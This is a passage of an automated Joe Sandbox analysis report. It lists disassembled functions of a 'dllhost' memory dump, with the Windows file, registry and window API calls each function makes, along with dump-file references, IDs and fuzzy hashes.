                                                                              • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                                              Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileMove
                                                                              • String ID:
                                                                              • API String ID: 3562171763-0
                                                                              • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                                                              • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                                                              Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 0040233D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID:
                                                                              • API String ID: 390214022-0
                                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                              Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406110
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                                              Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405DD5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                                              Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E04
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                              • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                              • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                                              Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString
                                                                              • String ID:
                                                                              • API String ID: 1096422788-0
                                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                              Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                              Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                              • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                              Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                                              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                                              Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                              Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                              Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                              Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
